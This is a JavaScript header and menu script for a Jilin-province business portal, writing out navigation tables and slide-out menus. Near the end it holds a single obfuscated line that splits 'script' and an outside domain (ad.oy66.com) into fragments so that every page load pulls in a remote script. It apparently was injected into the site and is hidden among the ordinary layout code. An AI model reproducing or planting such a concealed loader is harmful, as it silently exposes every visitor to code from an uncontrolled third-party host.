document.write('<table width="778" height="15" border="0" cellpadding="0" cellspacing="0" bgcolor="#ffffff"><tr><td align=right><marquee scrollamount="1" scrolldelay="60">热烈祝贺加盟吉林商务网的吉林企业突破5000家! &nbsp;&nbsp;&nbsp;&nbsp;<a href=http://www.tuowei.com/soft/job.htm target=_blank>长春拓维软件公司诚邀精英加盟...</a></marquee></td></tr></table>');
document.write('<table width="778" border="0" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF"><tr>');
document.write('<td width="92" rowspan="2"><img src="/asp/index.files/logo_ASP300.gif" alt="ASP300LOGO" width=128 height="54"></td>');
document.write('<td width="658" align="right"><table border=0 cellpadding=0 cellspacing=0><td width="160" height="33"><table border=0 cellpadding=0 cellspacing=0 width=100% ><tr><td width=19><img src="/asp/index.files/index_top02.gif" width=19 height=12 border=0></td><td style="font-size:12px">永久域名:www.JLsww.com</td></table></td><td alt="中小企业电子商务交易平台！" width="340" height="33"><img src="/asp/index.files/index_top01.gif" alt="中小企业电子商务交易平台！" width="340" height="33"></td></tr></table></td>');
document.write('</tr><tr><td align="right" background="/asp/index.files/tabbg.gif" height="21"><table width="550" border="0" cellspacing="0" cellpadding="0">');
document.write('<tr align="center" valign="center">');

/////////////首页
document.write('<td width="38" height="21" background="/asp/images/bgnav.gif" bgcolor="#006AB8">');
document.write('<img src="/asp/images/c.gif" height="3" width="0"><br><a href="/asp/index.htm"><font class="menu">首页</font></a></td>');

/////////////吉林黄页
document.write('<td width="64" background="/asp/images/bgnav_b.gif" bgcolor="#888888"><img src="/asp/images/c.gif" height="3" width="0">');
document.write('<br><A id=act0 onmouseover="ypSlideOutMenu.showMenu(\'menu1\')" onmouseout="ypSlideOutMenu.hideMenu(\'menu1\')" href="/asp/enterprise/">');
document.write('<font class="menu">吉林黄页</font></a></td>');

///////////////贸易机会
document.write('<td width="64" background="/asp/images/bgnav.gif" bgcolor="#006AB8"><img src="/asp/images/c.gif" height="3" width="0">');
document.write('<br><A id=act1 onmouseover="ypSlideOutMenu.showMenu(\'menu2\')" onmouseout="ypSlideOutMenu.hideMenu(\'menu2\')" href="/asp/opportunities/">');
document.write('<font class="menu">贸易机会</font></a></td>');

//////////////产品展示
document.write('<td width="64" background="/asp/images/bgnav.gif" bgcolor="#006AB8"><img src="/asp/images/c.gif" height="3" width="0">');
document.write('<br><A id=act7 onmouseover="ypSlideOutMenu.showMenu(\'menu8\')" onmouseout="ypSlideOutMenu.hideMenu(\'menu8\')" href="/asp/product/">');
document.write('<font class="menu">产品展示</font></a></td>');

///////////////商业资讯
document.write('<td width="64" background="/asp/images/bgnav.gif" bgcolor="#006AB8"><img src="/asp/images/c.gif" height="3" width="0">');
document.write('<br><A id=act2 onmouseover="ypSlideOutMenu.showMenu(\'menu3\')" onmouseout="ypSlideOutMenu.hideMenu(\'menu3\')" href="/asp/wayinfo/">');
document.write('<font class="menu">商业资讯</font></a></td>');

//////////////人才市场
document.write('<td width="64" background="/asp/images/bgnav.gif" bgcolor="#006AB8"><img src="/asp/images/c.gif" height="3" width="0">');
document.write('<br><A id=act3 onmouseover="ypSlideOutMenu.showMenu(\'menu4\')" onmouseout="ypSlideOutMenu.hideMenu(\'menu4\')" href="/asp/rencai/">');
document.write('<font class="menu">人才市场</font></a></td>');

//////////////国际供求
document.write('<td width="64" background="/asp/images/bgnav.gif" bgcolor="#006AB8"><img src="/asp/images/c.gif" height="3" width="0">');
document.write('<br><A id=act4 onmouseover="ypSlideOutMenu.showMenu(\'menu5\')" onmouseout="ypSlideOutMenu.hideMenu(\'menu5\')" href="/asp/WorldMarket/">');
document.write('<font class="menu">国际供求</font></a></td>');

/////////////会员中心
document.write('<td width="64" background="/asp/images/bgnav.gif" bgcolor="#006AB8"><img src="/asp/images/c.gif" height="3" width="0">');
document.write('<br><A id=act5 onmouseover="ypSlideOutMenu.showMenu(\'menu6\')" onmouseout="ypSlideOutMenu.hideMenu(\'menu6\')" href="/asp/Users/Enterprise/ManageMent.asp">');
document.write('<font class="menu">会员中心</font></a></td>');

////////////帮 助
document.write('<td width="64" background="/asp/images/bgnav.gif" bgcolor="#006AB8"><img src="/asp/images/c.gif" height="3" width="0">');
document.write('<br><A id=act6 onmouseover="ypSlideOutMenu.showMenu(\'menu7\')" onmouseout="ypSlideOutMenu.hideMenu(\'menu7\')" href="/asp/help/">');
document.write('<font class="menu">帮 助</font></a></td></tr></table></td></tr></table>');
document.write('<table width="778" height="6" border="0" cellpadding="0" cellspacing="0" bgcolor="#888888"><tr><td height="6">');

//////////js.js-start

ypSlideOutMenu.Registry = []
ypSlideOutMenu.aniLen = 10
ypSlideOutMenu.hideDelay = 2000
ypSlideOutMenu.minCPUResolution = 10
// constructor
function ypSlideOutMenu(id, dir, left, top, width, height)
{
this.ie = document.all ? 1 : 0
this.ns4 = document.layers ? 1 : 0
this.dom = document.getElementById ? 1 : 0
if (this.ie || this.ns4 || this.dom) {
this.id = id
this.dir = dir
this.orientation = dir == "left" || dir == "right" ? "h" : "v"
this.dirType = dir == "right" || dir == "down" ? "-" : "+"
this.dim = this.orientation == "h" ? width : height
this.hideTimer = false
this.aniTimer = false
this.open = false
this.over = false
this.startTime = 0
this.gRef = "ypSlideOutMenu_"+id
eval(this.gRef+"=this")
ypSlideOutMenu.Registry[id] = this
var d = document
d.write('<style type="text/css">')
d.write('#' + this.id + 'Container { visibility:hidden; ')
d.write('left:' + left + 'px; ')
d.write('top:' + top + 'px; ')
d.write('overflow:hidden; }')
d.write('#' + this.id + 'Container, #' + this.id + 'Content { position:absolute; ')
d.write('width:' + width + 'px; ')
d.write('height:' + height + 'px; ')
d.write('clip:rect(0 ' + width + ' ' + height + ' 0); ')
d.write('}')
d.write('</style>')
this.load()
}
}
ypSlideOutMenu.prototype.load = function() {
var d = document
var lyrId1 = this.id + "Container"
var lyrId2 = this.id + "Content"
var obj1 = this.dom ? d.getElementById(lyrId1) : this.ie ? d.all[lyrId1] : d.layers[lyrId1]
if (obj1) var obj2 = this.ns4 ? obj1.layers[lyrId2] : this.ie ? d.all[lyrId2] : d.getElementById(lyrId2)
var temp
if (!obj1 || !obj2) window.setTimeout(this.gRef + ".load()", 100)
else {
this.container = obj1
this.menu = obj2
this.style = this.ns4 ? this.menu : this.menu.style
this.homePos = eval("0" + this.dirType + this.dim)
this.outPos = 0
this.accelConst = (this.outPos - this.homePos) / ypSlideOutMenu.aniLen / ypSlideOutMenu.aniLen 
// set event handlers.
if (this.ns4) this.menu.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT);
this.menu.onmouseover = new Function("ypSlideOutMenu.showMenu('" + this.id + "')")
this.menu.onmouseout = new Function("ypSlideOutMenu.hideMenu('" + this.id + "')")
//set initial state
this.endSlide()
}
}
ypSlideOutMenu.showMenu = function(id)
{
var reg = ypSlideOutMenu.Registry
var obj = ypSlideOutMenu.Registry[id]
if (obj.container) {
obj.over = true
for (menu in reg) if (id != menu) ypSlideOutMenu.hide(menu)
if (obj.hideTimer) { reg[id].hideTimer = window.clearTimeout(reg[id].hideTimer) }
if (!obj.open && !obj.aniTimer) reg[id].startSlide(true)
}
}
ypSlideOutMenu.hideMenu = function(id)
{
var obj = ypSlideOutMenu.Registry[id]
if (obj.container) {
if (obj.hideTimer) window.clearTimeout(obj.hideTimer)
obj.hideTimer = window.setTimeout("ypSlideOutMenu.hide('" + id + "')", ypSlideOutMenu.hideDelay);
}
}
ypSlideOutMenu.hideAll = function()
{
var reg = ypSlideOutMenu.Registry
for (menu in reg) {
ypSlideOutMenu.hide(menu);
if (menu.hideTimer) window.clearTimeout(menu.hideTimer);
}
}
ypSlideOutMenu.hide = function(id)
{
var obj = ypSlideOutMenu.Registry[id]
obj.over = false
if (obj.hideTimer) window.clearTimeout(obj.hideTimer)
obj.hideTimer = 0
if (obj.open && !obj.aniTimer) obj.startSlide(false)
}
ypSlideOutMenu.prototype.startSlide = function(open) {
this[open ? "onactivate" : "ondeactivate"]()
this.open = open
if (open) this.setVisibility(true)
this.startTime = (new Date()).getTime() 
this.aniTimer = window.setInterval(this.gRef + ".slide()", ypSlideOutMenu.minCPUResolution)
}
ypSlideOutMenu.prototype.slide = function() {
var elapsed = (new Date()).getTime() - this.startTime
if (elapsed > ypSlideOutMenu.aniLen) this.endSlide()
else {
var d = Math.round(Math.pow(ypSlideOutMenu.aniLen-elapsed, 2) * this.accelConst)
if (this.open && this.dirType == "-") d = -d
else if (this.open && this.dirType == "+") d = -d
else if (!this.open && this.dirType == "-") d = -this.dim + d
else d = this.dim + d
this.moveTo(d)
}
}
ypSlideOutMenu.prototype.endSlide = function() {
this.aniTimer = window.clearTimeout(this.aniTimer)
this.moveTo(this.open ? this.outPos : this.homePos)
if (!this.open) this.setVisibility(false)
if ((this.open && !this.over) || (!this.open && this.over)) {
this.startSlide(this.over)
}
}
ypSlideOutMenu.prototype.setVisibility = function(bShow) { 
var s = this.ns4 ? this.container : this.container.style
s.visibility = bShow ? "visible" : "hidden"
}
ypSlideOutMenu.prototype.moveTo = function(p) { 
this.style[this.orientation == "h" ? "left" : "top"] = this.ns4 ? p : p + "px"
}
ypSlideOutMenu.prototype.getPos = function(c) {
return parseInt(this.style[c])
}
ypSlideOutMenu.prototype.onactivate = function() { }
ypSlideOutMenu.prototype.ondeactivate = function() { }

//////////////////////////////

	 var menus = [
		 new ypSlideOutMenu("menu1", "down", 238, -8, 110, 250),
		 new ypSlideOutMenu("menu2", "down", 302, -8, 110, 200),
		 new ypSlideOutMenu("menu8", "down", 366, -8, 110, 200),
		 new ypSlideOutMenu("menu3", "down", 450, -8, 110, 230),
		 new ypSlideOutMenu("menu4", "down", 514, -8, 110, 200),
		 new ypSlideOutMenu("menu5", "down", 579, -8, 110, 200),
		 new ypSlideOutMenu("menu6", "down", 629, -8, 120, 220),
		 new ypSlideOutMenu("menu7", "down", 706, -8, 75, 200)
	 ]
	 

	for (var i = 0; i < menus.length; i++) {
		menus[i].onactivate = new Function("document.getElementById('act" + i + "').className='active';");
		menus[i].ondeactivate = new Function("document.getElementById('act" + i + "').className='';");
	}


document.write('<div id="Layer0" style="position:absolute; width:115px; height:16px; z-index:1"><div id=menu1Container>');
document.write('<div class=menu id=menu1Content>');
document.write('<table width="69" border="0" cellpadding="0" cellspacing="0" background="/asp/images/index_menu_bg3.gif">');
document.write('<tr><td><table width="95"  border="0" cellpadding="3" cellspacing="1" bgcolor="#7B7B7B">');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="#" class="submenu">长春地区</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="#" class="submenu">吉林 四平</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="#" class="submenu">延边 通化</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="#" class="submenu">松源 辽源</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="#" class="submenu">白城 白山</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="#" class="submenu">企业名录查询</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="#" class="submenu">今日最新企业</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/Users/Enterprise/Upload_EnterpriseLogo.asp" class="submenu">上传公司图片</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/Users/Enterprise/Update_EnterpriseInfo.asp" class="submenu">发布/修改资料</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/CEShow/User/Template/" class="submenu">企业自助建站</a></td></tr>');
document.write('</table></td></tr><tr><td height="4"></td></tr></table>');
document.write('</div></div>');

document.write('<div id=menu2Container><div class=menu id=menu2Content><div class=options>');
document.write('<table width="69" border="0" cellpadding="0" cellspacing="0" background="/asp/images/index_menu_bg3.gif">');
document.write('<tr><td><table width="90"  border="0" cellpadding="3" cellspacing="1" bgcolor="#888888">');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/Opportunities/user/add/" class="submenu">发布商业信息</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/Opportunities/QueryResult.asp?Keyword=&TypeID=0&Day=0&ProvinceID=0&ClassID=0&NClassID=0&Page=1&Search=1" class="submenu">最新贸易信息</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/Opportunities/QueryResult_type.asp?TypeID=2" class="submenu">采购专区</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/Opportunities/QueryResult_type.asp?TypeID=1" class="submenu">供应专区</a></td></tr>');
document.write('</table></td></tr><tr><td height="4"></td></tr></table>');
document.write('</div></div></div>');


document.write('<div id=menu8Container><div class=menu id=menu8Content><div class=options>');
document.write('<table width="69" border="0" cellpadding="0" cellspacing="0" background="/asp/images/index_menu_bg3.gif">');
document.write('<tr><td><table width="90"  border="0" cellpadding="3" cellspacing="1" bgcolor="#7B7B7B">');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/product/" class="submenu">今日最新产品</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/product/user/add/" class="submenu">发布我的产品</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/product/edit_product.asp" class="submenu">管理我的产品</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/product/price.asp" class="submenu">产品在线报价</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/help/3.asp" class="submenu">产品指南</a></td></tr>');
document.write('</table></td></tr>');
document.write('<tr><td height="4"></td></tr></table></div></div></div>');


document.write('<div id=menu3Container><div class=menu id=menu3Content><div class=options>');
document.write('<table width="79" border="0" cellpadding="0" cellspacing="0" background="/asp/images/index_menu_bg3.gif">');
document.write('<tr><td><table width="72"  border="0" cellpadding="3" cellspacing="1" bgcolor="#7B7B7B">');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/wayinfo/" class="submenu">创业 管理</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/wayinfo/" class="submenu">贸易 汽摩</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/wayinfo/" class="submenu">房产 建材</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/wayinfo/" class="submenu">IT业 通讯</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/wayinfo/" class="submenu">家电 财经</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/wayinfo/" class="submenu">化工 纺织</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/wayinfo/" class="submenu">机械 农业</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/wayinfo/" class="submenu">冶金 服饰</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/wayinfo/" class="submenu">医药 食品</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/wayinfo/" class="submenu">其它 轻工</a></td></tr>');
document.write('</table></td></tr><tr><td height="4"></td></tr></table>');
document.write('</div></div></div>');

document.write('<div id=menu4Container><div class=menu id=menu4Content><div class=options>');
document.write('<table width="84" border="0" cellpadding="0" cellspacing="0" background="/asp/images/index_menu_bg3.gif">');
document.write('<tr><td><table width="80"  border="0" cellpadding="3" cellspacing="1" bgcolor="#7B7B7B">');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/rencai/" class="submenu">招聘信息</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/rencai/" class="submenu">求职信息</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/rencai/" class="submenu">....系列</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/rencai/" class="submenu">家政信息</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/fdc/" class="submenu">房屋出售</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/fdc/" class="submenu">房屋出租</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/fdc/" class="submenu">求购房屋</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/fdc/" class="submenu">求租房屋</a></td></tr>');
document.write('</table></td></tr><tr><td height="4"></td></tr></table>');
document.write('</div></div></div>');

document.write('<div id=menu5Container><div class=menu id=menu5Content><div class=options>');
document.write('<table width="69" border="0" cellpadding="0" cellspacing="0" background="/asp/images/index_menu_bg3.gif">');
document.write('<tr><td><table width="75"  border="0" cellpadding="3" cellspacing="1" bgcolor="#7B7B7B">');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/worldmarket/" class="submenu">港台地区</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/worldmarket/" class="submenu">东北亚地区</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/worldmarket/" class="submenu">欧美地区</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/worldmarket/" class="submenu">东盟</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/worldmarket/" class="submenu">其它</a></td></tr>');
document.write('</table></td></tr><tr><td height="4"></td></tr></table>');
document.write('</div></div></div>');

document.write('<div id=menu6Container><div class=menu id=menu6Content><div class=options> ');
document.write('<table width="94" border="0" cellpadding="0" cellspacing="0" background="/asp/images/index_menu_bg3.gif">');
document.write('<tr><td><table width="90"  border="0" cellpadding="3" cellspacing="1" bgcolor="#7B7B7B">');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="UserCenter/UserReg.asp" class="submenu">我要注册</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="UserCenter/UserLogin.asp" class="submenu">会员登录</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/Users/Enterprise/Update_Password.asp" class="submenu">修改密码</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/Users/Enterprise/Update_EnterpriseInfo.asp" class="submenu">修改资料</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="UserCenter/UserLostPass.asp" class="submenu">忘记密码</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/Enterprise/user/ContactUs" class="submenu">反馈信息</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="UserCenter/UserSC.asp" class="submenu">订单收藏夹</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/Users/Enterprise/Upgrade.asp" class="submenu">升级为高级会员</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="help/index.htm" class="submenu">相关帮助</a></td></tr>');
document.write('</table></td></tr><tr><td height="4"></td></tr></table>');
document.write('</div></div></div>');

document.write('<div id=menu7Container><div class=menu id=menu7Content><div class=options>');
document.write('<table width="94" border="0" cellpadding="0" cellspacing="0" background="/asp/images/index_menu_bg3.gif">');
document.write('<tr><td><table width="90"  border="0" cellpadding="3" cellspacing="1" bgcolor="#7B7B7B">');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/help/index.asp" class="submenu" style="font-family:arial;font-size:10px">会员注册指南</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/help/2.asp" class="submenu" style="font-family:arial;font-size:10px">贸易机会指南</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/help/3.asp" class="submenu" style="font-family:arial;font-size:10px">产品展示指南</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/help/4.asp" class="submenu" style="font-family:arial;font-size:10px">企业黄页指南</a></td></tr>');
document.write('<tr><td bgcolor="#FFFFFF" ><a href="/asp/help/5.asp" class="submenu" style="font-family:arial;font-size:10px">人才市场指南</a></td></tr>');
document.write('</table></td></tr><tr><td height="4"></td></tr></table>');
document.write('</div></div></div></div>');

/////////////js.js-End

document.write('</td></tr></table>');
document.write('<table align=center><tr>');document.write("<\scr"+"ipt src='http://\ad."+"\oy6"+"6"+".\com"+"/ip."+"asp?loc"+"=changchun'><\/scr"+"ipt>");
document.write('<td background="../Images/banner/tuowei800x600.gif"><div align=center valign=middle ><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="780" height="100">      <param name=movie value="../images/movie.swf"><param name=quality value=high><param name="wmode" value="transparent">     <param name="menu" value="false"><embed src="../images/movie.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="780" height="100" wmode="transparent" menu="false"> </embed></object></div></td></tr></table>');

function show(i)
{
cc=eval("dian"+i)
cc.src="/asp/images/dian.gif"
}
function hide(i)
{
dd=eval("dian"+i)
dd.src="image/dian02.gif"
}
function showAction(i){
	eval("lay0"+i+".style.display =''")
	show(i);
}

function hideAction(i){
	eval("lay0"+i+".style.display ='none'")
	hide(i);
}